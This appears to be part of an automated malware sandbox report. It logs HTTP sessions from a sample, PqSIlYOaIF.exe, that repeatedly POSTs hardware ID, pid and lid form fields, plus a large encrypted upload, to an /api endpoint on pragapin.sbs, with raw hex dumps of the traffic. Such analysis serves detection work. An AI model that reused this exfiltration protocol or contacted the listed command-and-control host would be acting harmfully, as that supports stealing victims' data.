                                                                                                                                                                                2024-11-10 08:18:13 UTC15082OUTData Raw: 2d 2d 52 37 30 55 54 4d 4a 4e 34 42 4e 4a 35 48 48 54 57 36 31 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 45 46 32 45 39 30 31 42 41 31 45 41 34 31 39 34 39 31 33 35 43 44 30 42 33 31 45 30 45 32 33 0d 0a 2d 2d 52 37 30 55 54 4d 4a 4e 34 42 4e 4a 35 48 48 54 57 36 31 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 37 30 55 54 4d 4a 4e 34 42 4e 4a 35 48 48 54 57 36 31 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d
                                                                                                                                                                                Data Ascii: --R70UTMJN4BNJ5HHTW61QContent-Disposition: form-data; name="hwid"2EF2E901BA1EA41949135CD0B31E0E23--R70UTMJN4BNJ5HHTW61QContent-Disposition: form-data; name="pid"2--R70UTMJN4BNJ5HHTW61QContent-Disposition: form-data; name="lid"BVnUqo-
                                                                                                                                                                                2024-11-10 08:18:13 UTC1009INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Sun, 10 Nov 2024 08:18:13 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Set-Cookie: PHPSESSID=rm3ke9rgqr47c9dk1t6sskgjql; expires=Thu, 06-Mar-2025 02:04:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rjyQ2jQA6pOMelW9n96s4cqncGDoNSo5HOvk8dyYpxoGtwFGbKCIPSAzBuodvp48JBwMY2XlZAya5k71qQMNGCTec1NfFJZcemz%2BYFNI7w%2BD5lMptndOWBL88Pf6%2BOk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8e049c4feedd2c9e-DFW
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1292&sent=14&recv=20&lost=0&retrans=0&sent_bytes=2828&recv_bytes=16020&delivery_rate=2205635&cwnd=251&unsent_bytes=0&cid=c66363a57de4df91&ts=818&x=0"
                                                                                                                                                                                2024-11-10 08:18:13 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                                                                                                                                Data Ascii: 11ok 173.254.250.72
                                                                                                                                                                                2024-11-10 08:18:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                4192.168.2.949781104.21.39.34437908C:\Users\user\Desktop\PqSIlYOaIF.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-11-10 08:18:14 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=2E9ELY5C6EUNUUQW6CTIZRXBS
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Content-Length: 20628
                                                                                                                                                                                Host: pragapin.sbs
                                                                                                                                                                                2024-11-10 08:18:14 UTC15331OUTData Raw: 2d 2d 32 45 39 45 4c 59 35 43 36 45 55 4e 55 55 51 57 36 43 54 49 5a 52 58 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 45 46 32 45 39 30 31 42 41 31 45 41 34 31 39 34 39 31 33 35 43 44 30 42 33 31 45 30 45 32 33 0d 0a 2d 2d 32 45 39 45 4c 59 35 43 36 45 55 4e 55 55 51 57 36 43 54 49 5a 52 58 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 32 45 39 45 4c 59 35 43 36 45 55 4e 55 55 51 57 36 43 54 49 5a 52 58 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22
                                                                                                                                                                                Data Ascii: --2E9ELY5C6EUNUUQW6CTIZRXBSContent-Disposition: form-data; name="hwid"2EF2E901BA1EA41949135CD0B31E0E23--2E9ELY5C6EUNUUQW6CTIZRXBSContent-Disposition: form-data; name="pid"3--2E9ELY5C6EUNUUQW6CTIZRXBSContent-Disposition: form-data; name="
                                                                                                                                                                                2024-11-10 08:18:14 UTC5297OUTData Raw: bd 51 c2 c3 85 fc c9 73 85 73 b5 b3 fb 1e ad 65 a2 84 e9 f2 68 b1 54 18 69 48 37 7a 99 99 08 13 c6 1b 09 3d 51 42 2d 3f 59 1d 59 90 6a 24 94 cb a5 d1 7c a5 91 90 6c b4 51 98 a9 b7 4a 24 6e 49 6e c9 56 ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii: QssehTiH7z=QB-?YYj$|lQJ$nInVZ+?:us}Q0u?4E([
                                                                                                                                                                                2024-11-10 08:18:15 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Sun, 10 Nov 2024 08:18:15 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Set-Cookie: PHPSESSID=28u2tbrnd4pfmfap6ju1g9i3d6; expires=Thu, 06-Mar-2025 02:04:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nUb1d5tnJL%2BaN7jDEqi9iEMKxikDwyaA7KyS99jjVrjNFRVzcs9C7bpoqR1QtJll1JVKeQj1MPpb%2BU6wb3sDe0tTiJ0Eags8i34L7sssHHPBxkdPaOQo%2Frzx6%2BFT488%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8e049c59b96d6b1c-DFW
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=954&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2829&recv_bytes=21593&delivery_rate=2970256&cwnd=251&unsent_bytes=0&cid=1f6d914cf4d8bb3f&ts=1219&x=0"
                                                                                                                                                                                2024-11-10 08:18:15 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                                                                                                                                Data Ascii: 11ok 173.254.250.72
                                                                                                                                                                                2024-11-10 08:18:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                5192.168.2.949798104.21.39.34437908C:\Users\user\Desktop\PqSIlYOaIF.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-11-10 08:18:17 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=Y4PZIGXVNR2G30NYMQWV6G2
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Content-Length: 1288
                                                                                                                                                                                Host: pragapin.sbs
                                                                                                                                                                                2024-11-10 08:18:17 UTC1288OUTData Raw: 2d 2d 59 34 50 5a 49 47 58 56 4e 52 32 47 33 30 4e 59 4d 51 57 56 36 47 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 45 46 32 45 39 30 31 42 41 31 45 41 34 31 39 34 39 31 33 35 43 44 30 42 33 31 45 30 45 32 33 0d 0a 2d 2d 59 34 50 5a 49 47 58 56 4e 52 32 47 33 30 4e 59 4d 51 57 56 36 47 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 34 50 5a 49 47 58 56 4e 52 32 47 33 30 4e 59 4d 51 57 56 36 47 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a
                                                                                                                                                                                Data Ascii: --Y4PZIGXVNR2G30NYMQWV6G2Content-Disposition: form-data; name="hwid"2EF2E901BA1EA41949135CD0B31E0E23--Y4PZIGXVNR2G30NYMQWV6G2Content-Disposition: form-data; name="pid"1--Y4PZIGXVNR2G30NYMQWV6G2Content-Disposition: form-data; name="lid"
                                                                                                                                                                                2024-11-10 08:18:17 UTC1006INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Sun, 10 Nov 2024 08:18:17 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Set-Cookie: PHPSESSID=rc4n5vj6a9ndahg7qbhc0ikt6k; expires=Thu, 06-Mar-2025 02:04:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LORxmnLgFAs7prdrmZw%2BNSX2TAty40glb8iqCdeI1FrFMyRxfqbhMHNK1ponIqvor9mPaPEsvGswvpitF%2BoUEAuiW09psbPc2%2FLqYDbQn2P07Eys64kwfTgYmggyCKw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8e049c6969aae873-DFW
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1370&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=2206&delivery_rate=2071530&cwnd=251&unsent_bytes=0&cid=66185a1c9b8b73e5&ts=674&x=0"
                                                                                                                                                                                2024-11-10 08:18:17 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                                                                                                                                Data Ascii: 11ok 173.254.250.72
                                                                                                                                                                                2024-11-10 08:18:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                6192.168.2.949808104.21.39.34437908C:\Users\user\Desktop\PqSIlYOaIF.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-11-10 08:18:18 UTC292OUTPOST /api HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=77DTF4HWE1MXD9HP644Y5Y922Y12ARZ
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Content-Length: 585027
                                                                                                                                                                                Host: pragapin.sbs
                                                                                                                                                                                2024-11-10 08:18:18 UTC15331OUTData Raw: 2d 2d 37 37 44 54 46 34 48 57 45 31 4d 58 44 39 48 50 36 34 34 59 35 59 39 32 32 59 31 32 41 52 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 45 46 32 45 39 30 31 42 41 31 45 41 34 31 39 34 39 31 33 35 43 44 30 42 33 31 45 30 45 32 33 0d 0a 2d 2d 37 37 44 54 46 34 48 57 45 31 4d 58 44 39 48 50 36 34 34 59 35 59 39 32 32 59 31 32 41 52 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 37 44 54 46 34 48 57 45 31 4d 58 44 39 48 50 36 34 34 59 35 59 39 32 32 59 31 32 41 52 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a
                                                                                                                                                                                Data Ascii: --77DTF4HWE1MXD9HP644Y5Y922Y12ARZContent-Disposition: form-data; name="hwid"2EF2E901BA1EA41949135CD0B31E0E23--77DTF4HWE1MXD9HP644Y5Y922Y12ARZContent-Disposition: form-data; name="pid"1--77DTF4HWE1MXD9HP644Y5Y922Y12ARZContent-Disposition:
                                                                                                                                                                                2024-11-10 08:18:18 UTC15331OUTData Raw: f7 72 6e 3e f9 11 4c d7 27 b1 8a b4 4b 11 1f d2 33 ea 2d 8d 31 3d db 8f 0e 19 47 df 99 58 27 1b 83 89 d5 e2 ff c2 33 ff a5 13 c0 de df 47 c6 88 ad 65 b7 b3 84 27 14 18 bd a8 36 3c 3c 12 62 ee 3a 12 f2 ed 91 e8 d4 96 ba f2 c1 72 50 94 b0 26 a3 f9 f6 60 43 2b fe 60 de 07 b1 6e c9 76 68 19 2a 8f fe 16 af 89 6f 19 cf ff 33 06 25 af 7d 1e dd e8 a1 79 f9 ea b4 ce 8b 87 88 d7 ec e8 5a 59 09 95 a4 66 2f ac f9 f1 89 b5 24 58 d5 82 aa 89 38 4a cf 61 c5 ad dd 88 1f 0b 4c 2a e7 8e 33 4f 81 cb a2 c6 fb d3 8f 80 cb 2e b0 d0 78 97 7e 1e 29 97 a4 b9 b7 f8 37 d3 44 64 e7 8d 56 5d 53 3d b4 de a1 69 85 e2 3a e2 c7 29 86 02 dc 22 c9 2a 58 46 ea c6 68 86 ea f7 7e eb c4 1c 9d 13 fd 51 e8 1d 99 70 55 b5 d7 76 12 2b 30 5f 97 1a 0f ea 55 ba cf 80 c0 b9 96 b1 0a 04 78 ba 20 67 3a
                                                                                                                                                                                Data Ascii: rn>L'K3-1=GX'3Ge'6<<b:rP&`C+`nvh*o3%}yZYf/$X8JaL*3O.x~)7DdV]S=i:)"*XFh~QpUv+0_Ux g:
                                                                                                                                                                                2024-11-10 08:18:18 UTC15331OUTData Raw: 0a 2d f9 ee 5d e0 79 7e 25 c7 fe da f0 21 be 9b 3c 94 b6 e7 13 b3 57 1e c0 01 e6 f4 48 1f c1 c5 b9 d9 c7 a7 90 04 2f f3 c8 82 7d f1 2f 84 cc 91 bc d0 82 01 85 98 f5 72 68 63 12 b0 4f 58 73 ff 4c d0 fa de 98 51 2f e6 35 24 53 fe 8f 9d 9b ae 5f 13 aa bd 37 e8 ff db 2c 35 58 c8 0f 41 a1 18 4a 0a 3c 0a ff 83 6b 2a 94 61 5d 42 f7 65 e2 90 9b 18 c0 18 76 a3 00 e2 f7 d7 89 6c 5f 81 c6 14 2f d7 53 64 b4 42 a9 05 88 5d 24 9d 04 96 3b fe 1c 2a 7d 6c 7b 63 84 0c be 04 01 7c 88 20 31 9f e2 8f 6f dc 52 63 8c 4d bc 46 d6 82 86 cc 1f c1 0d 80 6a ae 64 c7 26 8e 41 b2 70 26 f6 96 d7 fa fb 3d 94 78 e0 f4 6b 1f 02 3d ae e7 0b 1a b7 30 37 36 3d 5f 00 1e 87 48 84 fe 50 3f 9e 2e e6 68 b7 35 2b a3 5c 80 bf c7 14 1b 2d 9a 3e 70 c4 e4 bf d4 90 73 a3 b5 a1 f1 80 44 c3 fe 08 1e f2
                                                                                                                                                                                Data Ascii: -]y~%!<WH/}/rhcOXsLQ/5$S_7,5XAJ<k*a]Bevl_/SdB]$;*}l{c| 1oRcMFjd&Ap&=xk=076=_HP?.h5+\->psD
                                                                                                                                                                                2024-11-10 08:18:18 UTC15331OUTData Raw: 34 7c f0 08 23 a3 ec 57 2d bb 15 4b 96 3e 62 69 7b e4 e3 dc 87 cb a7 64 01 21 8f 6c 5c e5 b3 c6 b4 1d 57 3c 38 aa 25 17 ad 76 30 38 46 a4 6a 17 b9 9c c0 50 38 86 e9 26 65 a6 ad 51 36 06 58 1e eb 31 ad af c4 28 07 a9 c3 05 b5 15 36 97 bc 12 30 68 6e e8 8e 6c 53 5b 9e d3 1c 70 fa 29 0d 1e 72 97 9b a8 2e 3b b3 79 de 8b f3 67 cb 77 c5 df b1 e9 3c 5f 07 c3 3c 76 ee 4a e6 b2 30 d7 20 11 f5 42 1a 53 08 dc 51 f2 c6 df 79 a2 93 f7 33 e4 7f ca 20 13 ac e4 3a 44 bb ae 8c a0 ff eb 7c a0 2f 8a ba 0f f1 db 38 38 bd 85 7f 46 02 d4 67 0d 21 60 2e 71 a4 ea fd 41 f8 07 a0 a8 b7 f4 a9 6e 78 55 bb 1e 17 ed 94 0c 52 05 f2 fa f4 61 79 70 ae ad 4b 08 3c 2c e5 09 30 b5 db 3c 5e d9 b6 45 9b 45 bc 76 c6 11 b1 44 fc d7 2c 57 21 fc 5b 8b 02 62 dc f5 fd 16 05 79 12 db 4f 4a 98 03 e9
                                                                                                                                                                                Data Ascii: 4|#W-K>bi{d!l\W<8%v08FjP8&eQ6X1(60hnlS[p)r.;ygw<_<vJ0 BSQy3 :D|/88Fg!`.qAnxURaypK<,0<^EEvD,W![byOJ
                                                                                                                                                                                2024-11-10 08:18:18 UTC15331OUTData Raw: d8 10 35 39 f2 02 cf d3 67 d8 1c 8a cf f2 11 e9 64 bd 6f 19 29 9c 56 de ea d2 98 be f5 ca 8c f0 83 78 c2 c8 a2 c2 39 a2 f9 2e 4a 8e 8e 43 5f 82 dc 1b c7 e4 14 9b f4 88 e2 1e 3d 89 c5 d3 1e 59 89 82 ec e0 57 62 ae d3 34 95 02 24 f9 72 2f 2e 26 c7 b6 d9 1c 25 4f 10 11 0a 5c fe 90 52 61 13 67 ea 48 1a 2a 13 f1 f9 cf 61 b4 dc b0 36 79 a1 f5 70 18 bf 50 8f a2 d0 4f 8d 84 b0 e2 13 88 d6 08 c3 c0 45 5f 8d 04 75 96 21 ca 22 f3 9d 00 e1 0b f6 96 3a ff 37 f1 a3 56 fa 46 84 00 f4 b3 0f 46 22 86 1f dc 1c ee 1c fc 74 b6 c4 e7 30 3d fa d3 c1 0b 66 bb db b9 5e 8e f0 6f 85 9c 16 da 24 0a fc 00 83 81 38 b8 18 f3 f2 ed eb 23 66 8d ff b7 91 f9 ce 1a b1 10 ef fb 18 02 16 84 b6 fa f0 65 fa 10 e2 60 70 60 49 7e 49 a4 ea 4e c6 b5 b7 bf 58 7d 1a 20 f6 0a c3 74 c6 9d 36 b8 19 6c
                                                                                                                                                                                Data Ascii: 59gdo)Vx9.JC_=YWb4$r/.&%O\RagH*a6ypPOE_u!":7VFF"t0=f^o$8#fe`p`I~INX} t6l
                                                                                                                                                                                2024-11-10 08:18:18 UTC15331OUTData Raw: fb e3 92 28 a5 1e 86 f8 d7 1a fa 27 28 d4 cf 45 6f 3f ce 46 1f 25 f5 82 6c eb a4 da f0 c0 35 71 84 bf a2 56 96 8c df 50 7c 9b 8e dc d4 9e ff fe 47 2c 01 ed 80 64 b5 94 aa 06 99 5b af bd c9 65 ab 78 86 e4 a0 df 7c 1a 92 6d de 48 21 ba 0f a7 95 09 74 70 65 ae 6d 2d 0a 2d 38 fa e4 c1 25 5d 2e 01 5b 2f 42 99 c1 ff 2e 34 35 5d 98 7f a8 ab 39 10 9d c2 9f 70 c3 7c bb 67 9c ca b6 80 2d ba 88 90 12 4c 7c ed d1 39 67 81 4b 53 27 fd fb 5c dc 7d e1 83 f0 29 61 b2 2c f6 96 26 5f ec 32 51 08 6d 86 dd 2e 2d 7b ed 61 5e 82 08 ce 0d 2b 40 7f 51 c6 5a 71 6a bc dd 70 d8 25 d6 37 a5 6b e2 65 d5 02 3b b0 af 89 2c 7d 97 8e 8d 6f b1 06 f1 c1 fa 71 d4 6c eb d2 78 27 8f 8c 78 e9 b8 12 bd 68 62 55 9f 19 b9 79 73 f3 47 57 be 2f 5f 85 79 c2 08 c4 7b f0 26 92 00 9c 1b 0b 48 05 fd 52
                                                                                                                                                                                Data Ascii: ('(Eo?F%l5qVP|G,d[ex|mH!tpem--8%].[/B.45]9p|g-L|9gKS'\})a,&_2Qm.-{a^+@QZqjp%7ke;,}oqlx'xhbUysGW/_y{&HR
                                                                                                                                                                                2024-11-10 08:18:18 UTC15331OUTData Raw: f1 c5 bd 7d a7 de 9c fc 02 82 e0 60 38 c4 13 3a 17 9f 99 de f2 38 aa 75 2a d3 03 8e b8 21 c6 dc 1b e3 9a 92 0c 8b 31 7d 9b 8d 30 a1 67 21 d2 85 c8 10 df c4 b4 86 4a 21 f6 21 a5 ec d0 70 33 3f 11 70 8a 17 f9 4b 2c 7e ae 5a d2 1e 9e f8 52 4d b3 dd 9c 9f 01 57 0e 2c 55 b3 8c 39 2b 1f 7e e2 8c 99 cb 93 e4 b0 a0 90 e7 41 73 bd 63 6b dc e4 ea f5 e7 19 75 d5 1f f8 eb d5 77 ae 0d 95 ec 43 83 8c fa b9 50 e1 b3 42 c0 a7 af ef 61 ed 7c b5 2c a8 ba 51 e9 b0 0f 0d 1b 18 20 ad a9 9e 5f 9b af c9 4b a6 7f ed 33 c4 a7 38 21 0d ef 42 d4 b3 79 70 52 a0 dd 71 7d ee 2a 04 d6 67 91 8a 84 74 4d b9 d4 42 90 b4 17 05 d7 71 3f ca 2d 33 6f 74 f8 fc 78 5f 44 b2 10 66 ee ba 3e 31 b5 fa 52 76 51 7d 90 a8 fd 58 21 fe d9 71 d7 c9 e2 d9 ca c3 09 0d d7 ea 99 f2 4b 55 9f 8e 86 5e 78 d0 d8
                                                                                                                                                                                Data Ascii: }`8:8u*!1}0g!J!!p3?pK,~ZRMW,U9+~AsckuwCPBa|,Q _K38!BypRq}*gtMBq?-3otx_Df>1RvQ}X!qKU^x
                                                                                                                                                                                2024-11-10 08:18:18 UTC15331OUTData Raw: 73 dc 0b a8 f2 06 ef 5b 36 dc 6a 9c 19 ec 6b 08 d5 a3 6e e7 fd af 9a d9 31 ef 24 2e b8 1f b4 f9 1f fd b2 96 db ef 5c d0 52 35 60 61 db 20 27 35 af 08 6e 2d 30 97 80 46 cb 60 a1 08 80 8e 81 f9 0a cb 3d bc 3f e4 6b d0 0f f7 25 e3 d9 8e c0 a8 33 62 4f fa 5b e6 7a 65 50 b3 01 e4 68 d7 fb 5b e8 de ec b0 95 e4 f9 54 ff ba c1 44 3c 88 d1 12 6f e1 31 2f dc 3d e6 b3 07 bf b4 79 f3 20 9f 71 57 88 cb dc fa 2c 49 b4 95 f0 95 84 44 f3 73 75 ec 4a cb 3d 68 8a d8 83 da 17 73 cf ac 4f 5a fb 6e 8d 40 85 d5 72 83 f5 41 8f 56 6c e8 3f 0b d8 80 51 e6 48 7a 5f 8a 07 cb ff a6 71 5a 79 9b 85 03 44 a2 bd 9d ef 79 16 9d 62 cd e9 35 2f ef 47 df c8 1f e0 bb f3 4a 69 46 61 ea bc 89 c1 f1 9e ad c6 b3 2e 6f d3 54 dc 21 d2 b8 d0 f6 4e 6e f7 ff 46 42 70 49 61 3b b6 35 d7 56 1b 46 78 56
                                                                                                                                                                                Data Ascii: s[6jkn1$.\R5`a '5n-0F`=?k%3bO[zePh[TD<o1/=y qW,IDsuJ=hsOZn@rAVl?QHz_qZyDyb5/GJiFa.oT!NnFBpIa;5VFxV
                                                                                                                                                                                2024-11-10 08:18:18 UTC15331OUTData Raw: 69 f3 75 3b ec ba f5 58 0b 31 5f de de b1 8c 4e 94 6c d2 da da d3 96 70 ae 4b 63 93 b8 3a 3a 08 84 c2 22 b5 fa 83 4f 7b 2e 7d 0f 18 7a 3e 6d cc 88 d5 dc 60 0f 2e 9e b5 c5 82 63 66 ef ef 6e 1c 84 b0 36 25 91 37 1c ef 89 76 d7 0c a5 69 f4 bc 39 9f 71 15 f4 08 62 03 2a 74 ff 81 a8 97 f6 6a 83 6e 14 a3 d6 c7 4b 02 a2 6a b1 0a 1c 8f 87 5d 2c 93 23 26 bc 38 d6 f0 da f9 58 99 22 88 e3 83 a9 43 4a f8 9e 12 b0 85 45 24 b7 8b 96 15 e1 85 0e b3 56 84 5f bb 16 fd 6b 6a 0a 6a 39 0a f8 50 72 46 c9 3b 1a 1a e7 bc 96 2e 33 52 b7 47 72 bb 53 69 51 8a 62 b3 ca fd 60 5c e7 97 b0 92 14 c5 14 3b a1 05 71 de f7 f1 aa c1 77 4a 19 9f 0c b5 82 2f f5 03 5a 1e b1 d0 c4 c6 1f 01 3f 64 15 3a 2e 63 b1 21 f1 c2 7a ad de af e5 59 39 1b 6b c7 e4 78 55 13 3a 2e ec b3 98 f6 a7 c4 89 ee 33
                                                                                                                                                                                Data Ascii: iu;X1_NlpKc::"O{.}z>m`.cfn6%7vi9qb*tjnKj],#&8X"CJE$V_kjj9PrF;.3RGrSiQb`\;qwJ/Z?d:.c!zY9kxU:.3
                                                                                                                                                                                2024-11-10 08:18:18 UTC15331OUTData Raw: c1 10 aa 8b 35 22 8c c7 37 19 f4 87 64 8b ed d4 b1 3e 2c 4b 5a 5a 8b d9 14 27 e2 bd ea 5d 57 df ca e4 fb 88 59 32 c9 0a 10 d8 5c 3f 21 16 5c 86 c9 b4 94 b5 02 d8 3d d8 1e 4b 37 45 cb 3c f7 9a 40 f4 ad b3 83 03 45 3d 91 70 62 7c 8d df 86 8f e2 b8 c3 e8 41 14 ec 7f 38 d4 bc 28 a6 75 ed 5b 4f 81 16 8f d6 8e c3 e3 9f bd b1 cd ae d1 95 c8 fb 44 28 55 88 c2 51 0c b8 ef b9 f5 06 08 41 cc c7 44 bb c2 22 ad 54 46 60 30 96 34 05 97 28 f5 3c 84 58 4f f6 50 98 e7 70 49 f1 d3 81 19 dd ec 6a ce ad c2 1c 80 b7 4b 6c 5b 8c d5 a9 23 e7 8f ca a9 b4 c8 8b 68 e3 bf 7a 01 53 e3 71 1d 28 b3 d1 6f 86 4b ee 43 1d cb 21 74 df db 44 3f 50 cd 55 45 45 dd 56 1c e3 bb 05 a6 91 99 51 de 36 95 05 93 e1 f4 aa b6 b6 ac 42 8b 76 4c 8a 87 29 b1 cb ab a2 5f 5a 99 18 3d f5 ab d7 7b ff ed 63
